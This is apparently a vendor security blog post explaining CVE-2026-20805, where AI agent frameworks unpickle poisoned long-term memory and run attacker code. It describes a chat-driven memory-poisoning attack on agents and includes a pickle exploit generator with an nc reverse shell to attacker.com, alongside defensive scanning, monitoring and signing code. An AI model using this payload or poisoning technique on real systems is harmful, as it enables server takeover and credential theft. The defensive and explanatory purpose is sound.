The beginning of 2026 has been turbulent for the AI security community. Following the unauthenticated RCE in n8n (CVE-2026-21858) and the critical serialization flaws in LangChain (CVE-2025-68664), we are now facing an infrastructure-level nightmare: CVE-2026-20805.



If Prompt Injection is the “social engineering” of LLMs, CVE-2026-20805 is a direct lobotomy of the AI Agent’s nervous system. This vulnerability allows attackers to trigger Remote Code Execution (RCE) during the State Restoration process by poisoning the Vector Database or Session History.

This guide strips away generic security advice to dissect the exploit logic at the code level, analyzing how attackers compromise Agent Memory and how Penligent automates the detection of such threats before deployment.

The Root Cause: Implicit Trust in State Management

When building complex Multi-Agent systems (like those using LangGraph or AutoGen), developers must serialize the Agent’s state to persistent storage (Redis, Postgres, or ChromaDB) to maintain conversational continuity.

The core of CVE-2026-20805 lies in how certain orchestration frameworks handle this data. To preserve the complexity of Python objects (such as custom Tool classes or Function Call results), these frameworks often rely on unsafe deserialization methods (like `pickle` or unrestricted YAML loading) when retrieving state from the database.

The Attack Vector: Memory Poisoning

Unlike traditional Web RCE, CVE-2026-20805 is a Second-Order Storage Attack.

- Injection Phase: The attacker does not attack the Agent interface directly via an exploit payload. Instead, they use a standard chat window to induce the Agent to store a seemingly harmless but carefully crafted “toxic blob” into its Long-term Memory.

- Dormant Phase: This data sits silently in the Vector DB as Embeddings or a JSON Blob.

- Trigger Phase: When an administrator or another privileged Agent retrieves the context (e.g., executing a “summarize previous tasks” job), the framework pulls the data and deserializes it—BOOM. Code execution occurs on the server.
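The three phases can be walked through with a deliberately harmless stand-in. This is a minimal sketch, not the behavior of any specific framework: `memory_store`, `BenignMarker`, and the `session-42` key are hypothetical names, and the "payload" only calls `len` so that the effect is observable without doing anything dangerous.

```python
import base64
import json
import pickle


class BenignMarker:
    """Harmless stand-in for a malicious object (hypothetical name)."""

    def __reduce__(self):
        # On load, pickle calls len("abc") instead of rebuilding this object.
        return (len, ("abc",))


# Hypothetical stand-in for Redis, Postgres, or a vector DB.
memory_store = {}

# 1. Injection: the blob enters storage as ordinary Base64 text inside JSON.
blob_text = base64.b64encode(pickle.dumps(BenignMarker())).decode("ascii")
memory_store["session-42"] = json.dumps(
    {"note": "meeting summary", "state": blob_text}
)

# 2. Dormant: at rest, the record is only a string; nothing has executed.
record = json.loads(memory_store["session-42"])
is_plain_text = isinstance(record["state"], str)

# 3. Trigger: an unsafe loader decodes and unpickles the field on retrieval.
restored = pickle.loads(base64.b64decode(record["state"]))

# `restored` is the return value of the callable chosen by the blob's author,
# not a BenignMarker instance.
print(is_plain_text, restored)
```

The point of the sketch is that the value returned by `pickle.loads` is whatever the stored blob told the unpickler to call, which is why the trigger phase is where control is lost.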

Technical Autopsy: From Payload to Shell

Let’s look at a simplified vulnerable code snippet (simulating an affected Agent State Loader):

```python
# Vulnerable pattern: unsafe deserialization
import logging
import pickle


def load_agent_state(state_blob):
    """
    Retrieves Agent State from the Database.
    Intended to restore custom Tool objects.
    """
    try:
        # CVE-2026-20805: directly deserializing untrusted binary streams
        return pickle.loads(state_blob)
    except Exception as e:
        # By the time an exception is raised, a malicious payload may
        # already have executed.
        logging.error(f"State restoration failed: {e}")
```

Constructing the Exploit



The attacker constructs a malicious Python object using the `__reduce__` magic method to execute commands during deserialization.

```python
# Exploit generator
import base64
import os
import pickle


class MemoryJack(object):
    def __reduce__(self):
        # pickle calls the returned callable with the given args on load.
        # Reverse shell payload
        cmd = ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|'
               '/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f')
        return (os.system, (cmd,))


payload = pickle.dumps(MemoryJack())
print(f"Inject this blob into Agent Memory: {base64.b64encode(payload)}")
```

Why WAFs Miss This

Traditional WAFs scan for malicious patterns in HTTP requests. However, in CVE-2026-20805, the payload is Base64 encoded and buried deep within a legitimate JSON structure. Crucially, the data is treated as “text” or “vectors” upon entry. It only becomes executable code upon reconstruction (retrieval). The attack is effectively invisible at the gate.
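Because the payload only looks dangerous after decoding, a check has to decode it too. The sketch below is one possible pre-storage filter, not a complete defense: it walks a JSON document, Base64-decodes each string, and uses the standard library's `pickletools.genops` to list pickle opcodes without executing them. The function names, the `RISKY_OPCODES` set, and the JSON path format are assumptions made for illustration.

```python
import base64
import binascii
import pickletools

# Opcodes that import globals or invoke callables during unpickling.
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST",
    "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def looks_like_risky_pickle(text):
    """Return True if `text` is Base64 for a well-formed pickle stream
    that contains at least one risky opcode. Nothing is unpickled."""
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False  # not valid Base64
    try:
        # genops parses opcodes up to STOP and raises on malformed streams.
        names = {op.name for op, _arg, _pos in pickletools.genops(raw)}
    except Exception:
        return False  # not a parseable pickle stream
    return bool(names & RISKY_OPCODES)


def find_suspicious_fields(node, path="$"):
    """Recursively collect JSON paths whose string value looks risky."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            hits += find_suspicious_fields(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits += find_suspicious_fields(value, f"{path}[{index}]")
    elif isinstance(node, str) and looks_like_risky_pickle(node):
        hits.append(path)
    return hits
```

A filter like this would run where records are written to memory, not at the HTTP edge. It can be bypassed by other encodings or nested wrapping, so it complements removing unsafe deserialization and does not replace it.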

Impact Analysis: The Cloud Blast Radius

The consequences of CVE-2026-20805 far exceed typical Web RCE because it occurs directly within the Agent Runtime Environment.

| Dimension | Impact Details |
|---|---|
| Credential Exfiltration | Agent runtimes often mount OPENAI_API_KEY, AWS_ACCESS_KEY, and other high-sensitivity environment variables. RCE allows attackers to run `env` and exfiltrate all keys. |
| Intranet Pivoting | Modern AI Agents have permission to access internal APIs (Jira, GitHub, SQL DBs). Attackers can hijack the Agent’s identity to steal enterprise data through seemingly legitimate requests. |
| Supply Chain Poisoning | Attackers can modify the Agent’s Prompt Template, forcing it to output phishing links to all subsequent users, creating a persistent threat. |

The Penligent Automated Defense Perspective

Given the logical complexity of CVE-2026-20805, manual Code Review is inefficient: the unsafe deserialization call is often wrapped in seemingly legitimate “state restoration” features.

Penligent (https://penligent.ai/), the next-generation AI intelligent penetration testing platform, addresses this via its “State Fuzzing” module.

- Memory Poisoning Simulation: Penligent’s Virtual Adversary automatically generates thousands of serialization payloads and attempts to inject them into the Agent’s Short-term and Long-term memory via standard interfaces.

- Execution Flow Monitoring: Penligent goes beyond HTTP status codes. It uses eBPF to monitor underlying system calls (Syscalls) in the test environment. If `execve` or abnormal Outbound Connections are detected during Agent memory retrieval, Penligent flags CVE-2026-20805 immediately.

- Zero-False-Positive Validation: Unlike SAST tools, Penligent generates a reproducible PoC script proving the vulnerability is triggerable, offering remediation advice (e.g., replacing Pickle with JSON or implementing HMAC signatures).
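The idea of watching what happens during memory retrieval, rather than inspecting the input, can be approximated inside a Python test harness with the interpreter's audit hooks. This is not eBPF and is not a description of Penligent's implementation. It is a minimal in-process sketch built on `sys.addaudithook` and documented audit event names, and `LoadAuditor` is a hypothetical helper. It should only be pointed at untrusted blobs inside a disposable sandbox, because the blob is actually unpickled.

```python
import pickle
import sys


class LoadAuditor:
    """Records security-relevant audit events raised while unpickling."""

    # Event names documented in Python's audit events table.
    WATCHED = frozenset(
        {"pickle.find_class", "os.system", "subprocess.Popen", "socket.connect"}
    )

    def __init__(self):
        self.events = []
        self.recording = False
        # Audit hooks cannot be removed once added, so the hook stays cheap
        # and only records while `recording` is set.
        sys.addaudithook(self._hook)

    def _hook(self, event, args):
        if self.recording and event in self.WATCHED:
            self.events.append((event, repr(args)))

    def load(self, blob):
        """Unpickle `blob` (sandbox only) and return (result, events)."""
        self.events = []
        self.recording = True
        try:
            result = pickle.loads(blob)
        finally:
            self.recording = False
        return result, list(self.events)
```

A plain data blob such as a pickled dict of primitives should produce no watched events, while any blob that resolves a global or spawns a process during load leaves a trace that a test can assert on.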

If your team is deploying Agents based on LangGraph or similar frameworks, running a “Memory Layer Audit” via Penligent before production is the final line of defense.

Remediation & Hardening Strategies

- Abandon Pickle: Strictly forbid `pickle` for any data exchange across trust boundaries. Use JSON, Protobuf, or Pydantic models for state serialization.

- Implement Signing: If complex binary state storage is unavoidable, use HMAC to sign the data. Verify the signature before loading the state to ensure integrity.



- Least Privilege: Ensure containers running AI Agents (Docker/K8s) are ephemeral, stateless, and have strict Egress Filtering to prevent Reverse Shell connections to C2 servers.
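The first two recommendations can be combined: store state as JSON and attach an HMAC tag that is checked before anything is parsed. The following is a minimal sketch using only the standard library. The function names and the `tag.body` wire format are assumptions, and the key is expected to come from a secret manager, not from source code.

```python
import hashlib
import hmac
import json


def sign_state(state, key):
    """Serialize `state` as canonical JSON and prepend an HMAC-SHA256 tag."""
    body = json.dumps(state, sort_keys=True, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    return tag + b"." + body


def load_signed_state(blob, key):
    """Verify the tag first; parse the JSON body only if it matches."""
    tag, sep, body = blob.partition(b".")
    if not sep:
        raise ValueError("malformed state blob")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    # compare_digest avoids leaking the match position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("state signature mismatch")
    return json.loads(body)
```

Signing proves that the blob was written by a holder of the key. It does not make `pickle` safe if an attacker can influence what the application itself serializes, which is why the body here stays JSON.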

Conclusion

CVE-2026-20805 proves once again that AI security is not just about model robustness; it is the ghostly recurrence of traditional software vulnerabilities within AI architectures. As Agents become smarter, their Memory is becoming the attack surface hackers covet most.

Relevant Authority Links: